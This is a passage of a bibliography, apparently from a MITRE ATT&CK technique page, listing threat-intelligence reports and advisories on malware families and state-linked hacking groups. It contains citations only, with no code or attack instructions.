  69. Huss, D.. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.
  70. Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.
  71. Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.
  72. TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.
  73. Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.
  74. Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.
  75. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
  76. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
  77. Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
  78. Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.
  79. ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
  80. US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.
  81. US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.
  82. NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
  83. Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.
  84. Ladley, F. (2012, May 15). Backdoor.Ritsol. Retrieved February 23, 2018.
  85. Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018.
  86. Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
  87. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
  88. LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.
  89. Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.
  90. Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
  91. Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.
  92. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
  93. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
  94. Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
  95. Department of Justice. (2018, August 01). HOW FIN7 ATTACKED AND STOLE DATA. Retrieved August 24, 2018.
  96. Kizhakkinan, D. et al.. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.
  97. Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.
  98. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  99. Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.
  100. Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
  101. ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.
  102. Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.
  103. Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.
  104. Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020.
  105. Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.
  106. Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.
  107. Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.
  108. Reynolds, J.. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.
  109. Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020.
  110. Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
  111. Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
  112. Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.
  113. US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.
  114. Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020.
  115. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
  116. Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.
  117. Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.
  118. Falcone, R. and Lancaster, T.. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
  119. Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.
  120. Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.
  121. Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.
  122. Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.
  123. Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.
  124. ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.
  125. Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.
  126. Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
  127. Sharma, R. (2018, August 15). Revamped jRAT Uses New Anti-Parsing Techniques. Retrieved September 21, 2018.
  128. Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.
  129. Bingham, J. (2013, February 11). Cross-Platform Frutas RAT Builder and Back Door. Retrieved April 23, 2019.
  130. Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.
  131. Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.
  132. Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.
  133. Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.
  134. US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.
  135. Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.
  136. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
  137. Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.
  138. Moench, B. and Aboud, E. (2016, August 23). Trojan.Kwampirs. Retrieved May 10, 2018.
  139. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
  140. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
  141. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.
  142. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
  1. Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.
  2. Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.
  3. Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.
  4. FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
  5. ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.
  6. Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
  7. Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.
  8. Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.
  9. Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.
  10. PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
  11. United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.
  12. Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.
  13. Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.
  14. Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020.
  15. Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.
  16. Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.
  17. Kaspersky Lab's Global Research & Analysis Team. (2013, February 27). The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor. Retrieved April 5, 2017.
  18. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
  19. Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.
  20. Stama, D.. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016.
  21. GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.
  22. Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
  23. Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
  24. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
  25. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  26. ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
  27. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
  28. The DigiTrust Group. (2017, January 01). NanoCore Is Not Your Average RAT. Retrieved November 9, 2018.
  29. Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.
  30. Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.
  31. Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020.
  32. Sponchioni, R.. (2016, March 11). Backdoor.Nidiran. Retrieved August 3, 2016.
  33. Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019.
  34. Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.
  35. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.
  36. Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.
  37. Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
  38. Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.
  39. Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
  40. Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.
  41. Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.
  42. Mullaney, C. & Honda, H. (2012, May 4). Trojan.Pasam. Retrieved February 22, 2018.
  43. Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.
  44. Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti Group. Retrieved August 24, 2020.
  45. Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.
  46. Kaplan, D, et al. (2017, June 7). PLATINUM continues to evolve, find ways to maintain invisibility. Retrieved February 19, 2018.
  47. Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.
  48. Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.
  49. Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.
  50. Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
  51. hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.
  52. Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
  53. Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
  54. Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
  55. Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
  56. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
  57. Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.
  58. Nicolas Verdier. (n.d.). Retrieved January 29, 2018.
  59. MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.
  60. Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.
  61. Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.
  62. Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.
  63. Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.
  64. Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.
  65. PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.
  66. Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.
  67. Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.
  68. Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.
  69. Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.
  70. Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.
  71. Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.
  72. McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.
  73. Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.
  74. Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.
  75. Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.
  76. Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.
  77. Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019.
  78. Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.
  79. Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.
  80. Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
  81. Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.
  82. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
  83. Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.
  84. Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
  85. Grunzweig, J.. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016.
  86. Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.
  87. Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
  88. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.
  89. Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.
  90. Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.
  91. Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
  92. Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.
  93. Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020.
  94. Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.
  95. Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.
  96. Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.
  97. CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.
  98. National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.
  99. Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.
  100. Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.
  101. Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.
  102. Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
  103. FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
  104. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.
  105. Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.
  106. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
  107. Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.
  108. Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.
  109. Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.
  110. Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
  111. Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.
  112. ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.
  113. O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
  114. US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.
  115. Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.
  116. Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.
  117. Trend Micro. (2014, December 11). PE_URSNIF.A2. Retrieved June 5, 2019.
  118. Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019.
  119. Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
  120. Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.
  121. Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.
  122. GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
  123. Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.
  124. US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.
  125. US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.
  126. Yagi, J. (2014, August 24). Trojan.Volgmer. Retrieved July 16, 2018.
  127. Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.
  128. CISA. (2020, July 16). MAR-10296782-3.v1 – WELLMAIL. Retrieved September 29, 2020.
  129. PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.
  130. CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.
  131. Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020.
  132. Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.
  133. Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.
  134. S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.
  135. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.
  136. Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.
  137. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
  138. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
  139. Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.
  140. Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.
  141. Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.
  142. Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.